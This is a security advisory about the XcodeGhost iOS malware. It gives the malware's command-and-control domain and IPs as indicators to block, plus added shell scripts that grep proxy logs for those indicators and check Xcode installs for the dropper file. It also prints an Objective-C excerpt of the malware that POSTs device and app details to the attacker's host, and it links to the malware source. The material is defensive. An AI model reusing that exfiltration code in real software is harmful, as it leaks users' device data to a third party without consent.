Tips on Understanding and Detecting Apple iOS “XCodeGhost” Malware


Palo Alto Networks published information about the “XCodeGhost” malware, here: http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/

Major apps, including WeChat and Angry Birds 2, are among those infected.  The good news is that the malware's command-and-control hostname is easy to spot in the logs of your home firewall, wireless router or business network.

If you’re an iPhone user, check your firewall, wireless router or proxy server logs for HTTP traffic to http://init.icloud-analysis.com and for DNS lookups of init.icloud-analysis.com.  The malware talks plain HTTP, so a proxy sees the full request.  Keep in mind that only traffic on networks you log will show up: an infected phone on cellular data never touches your home router.

View the complete list of infected apps here.

Also, check for and block traffic to these IP addresses used by this malware:

  • 52.2.85.22
  • 52.4.74.88
  • 52.6.167.64
  • 52.68.131.221
  • 104.238.125.92

Remove any app from your iPhone that is trying to connect to these IP addresses or to the init.icloud-analysis.com domain.  Note that these addresses sit in cloud hosting ranges and can be reassigned to unrelated services over time, so treat the domain as the more durable indicator and re-check the IPs before keeping a long-term block.

Also, change passwords on all websites that are used by the infected applications.
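As an added example (not from the original post, and not from Palo Alto Networks or SnoopWall), the script below searches a proxy log for the indicators above and tells you which client devices produced the hits.  The log format (Squid native) and the log lines are constructed for illustration, not real captures, and the assumption that field 3 holds the client address is specific to that format.  The IP addresses are matched as whole tokens so that a longer address such as 52.2.85.220 is not mistaken for 52.2.85.22.

```shell
#!/bin/sh
# Added example (not from the original post): search a proxy/firewall log
# for the XcodeGhost indicators (the C2 domain and the listed IP addresses).

# Domain plus the five IPs. The IPs are anchored on both sides so that a
# longer address such as 52.2.85.220 does not match 52.2.85.22.
IOC_REGEX='init\.icloud-analysis\.com|(^|[^0-9.])(52\.2\.85\.22|52\.4\.74\.88|52\.6\.167\.64|52\.68\.131\.221|104\.238\.125\.92)([^0-9]|$)'

# Print every log line that touches an indicator.
# Usage: xcodeghost_ioc_hits <logfile>
xcodeghost_ioc_hits() {
    grep -Ei "$IOC_REGEX" "$1" || true   # no hits is not an error
}

# Number of matching lines ("0" when the log is clean).
xcodeghost_ioc_count() {
    grep -Eic "$IOC_REGEX" "$1" || true
}

# Client addresses behind the hits, one per line, so you know which device
# to inspect. Assumes Squid native log format, where field 3 is the client
# address (constructed assumption; adjust the field number for your logs).
xcodeghost_client_ips() {
    xcodeghost_ioc_hits "$1" | awk '{ print $3 }' | sort -u
}

# Constructed sample log in Squid native format; not a real capture.
# Line 3 is a near miss (52.2.85.220) and must not be reported.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
1442500000.123    245 192.168.1.23 TCP_MISS/200 512 POST http://init.icloud-analysis.com/ - HIER_DIRECT/52.2.85.22 -
1442500001.456    120 192.168.1.30 TCP_MISS/200 8192 GET http://example.com/index.html - HIER_DIRECT/93.184.216.34 text/html
1442500002.789     98 192.168.1.40 TCP_MISS/200 1024 GET http://example.net/ - HIER_DIRECT/52.2.85.220 text/html
1442500003.001    310 192.168.1.51 TCP_MISS/200 64 POST http://104.238.125.92/ - HIER_DIRECT/104.238.125.92 -
EOF

echo "Indicator hits: $(xcodeghost_ioc_count "$SAMPLE_LOG")"
xcodeghost_ioc_hits "$SAMPLE_LOG"
echo "Clients to inspect:"
xcodeghost_client_ips "$SAMPLE_LOG"
```

Point the functions at your own access.log instead of the sample file; the client-address column is the one to adjust if your router or proxy uses a different layout.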

If you’re an Apple iOS developer, look under the SDK directories in /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/ and check whether the file Library/Frameworks/CoreServices.framework/CoreService exists inside any of them.

If it does, you have the malicious version of Xcode and not the official Xcode from Apple.  Delete it, clean up, and get the official toolkit from Apple.  Only download developer tools from official locations.  Many vendors publish an MD5 or SHA-1 hash so you can confirm the file you downloaded matches theirs; a SHA-256 hash or a verified code signature is stronger evidence than MD5 or SHA-1, so prefer those where the vendor offers them.
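As an added example (not from the original post and not Apple's own tooling), this script automates the developer check above: it looks for the CoreService file under every platform SDK in an Xcode install, then asks Gatekeeper (spctl, macOS only) whether Xcode.app still carries a valid signature.  It goes slightly beyond the text by scanning all Platforms/*.platform directories, not only iPhoneOS.platform; the default path and the XCODE_APP override are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the original post or from Apple): look for the
# XcodeGhost dropper file in an Xcode install and verify Xcode's signature.

# Default Xcode location; override with XCODE_APP=/path/to/Xcode.app
XCODE_APP="${XCODE_APP:-/Applications/Xcode.app}"

# Print the path of every
#   Contents/Developer/Platforms/*.platform/Developer/SDKs/*.sdk/Library/Frameworks/CoreServices.framework/CoreService
# found under the given Xcode.app. A clean install has no such file, so any
# output is a finding. Scans every platform, not only iPhoneOS.platform.
# Usage: find_xcodeghost_files <Xcode.app path>
find_xcodeghost_files() {
    for sdk in "$1"/Contents/Developer/Platforms/*.platform/Developer/SDKs/*.sdk; do
        f="$sdk/Library/Frameworks/CoreServices.framework/CoreService"
        [ -e "$f" ] && echo "$f"
    done
    return 0
}

# Ask Gatekeeper whether the bundle is accepted (macOS only; skipped elsewhere).
# Usage: verify_xcode_signature <Xcode.app path>
verify_xcode_signature() {
    if command -v spctl >/dev/null 2>&1; then
        spctl --assess --verbose "$1" || echo "WARNING: $1 failed Gatekeeper assessment"
    else
        echo "spctl not available on this host (macOS only); signature check skipped"
    fi
    return 0
}

# When run directly: report on the real install.
found=$(find_xcodeghost_files "$XCODE_APP")
if [ -n "$found" ]; then
    echo "XcodeGhost indicator file(s) present; this Xcode is not clean:"
    echo "$found"
else
    echo "No CoreService dropper found under $XCODE_APP"
fi
verify_xcode_signature "$XCODE_APP"
```

A hit from find_xcodeghost_files is decisive on its own; the spctl step is a second, independent check that the bundle has not been tampered with since Apple signed it.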

If you are a developer and interested in more information, the Source Code to XCodeGhost is in github, here: https://github.com/XcodeGhostSource/XcodeGhost

This shows that it connects as follows (concatenatedData holds the encoded device and app information listed below):

    // Build a POST to the command-and-control host over plain, unencrypted HTTP
    NSURL *url = [NSURL URLWithString:@"http://init.icloud-analysis.com"];
    NSMutableURLRequest *request = [NSMutableURLRequest requestWithURL:url cachePolicy:NSURLRequestReloadIgnoringCacheData timeoutInterval:30];
    [request setHTTPMethod:@"POST"];
    // The body is the collected data; Content-Length is set explicitly to its size
    [request setValue:[NSString stringWithFormat:@"%lu",(unsigned long)[concatenatedData length]] forHTTPHeaderField:@"Content-Length"];
    [request setHTTPBody: concatenatedData];

With the following information sent to the server:

  •     Application name
  •     Application version
  •     OS version
  •     Language
  •     Country
  •     Developer info
  •     Application installation type
  •     Device name
  •     Device type

Stay tuned for a patch from Apple and a list of the infected apps they have been cleaning up.  Until then, clean up your phone using our ‘spring cleaning’ tips: delete all iPhone and iPad apps you are not using, then look more closely at the permissions, privacy policy, developer website and support email of the apps you plan to keep.  Contact the developers via their support email and see how they respond.  Any app that seems fishy probably is.  Remove every app that asks for more permissions than it needs.

Source:  SnoopWall.com, PaloAltoNetworks.com, and Sans.Edu.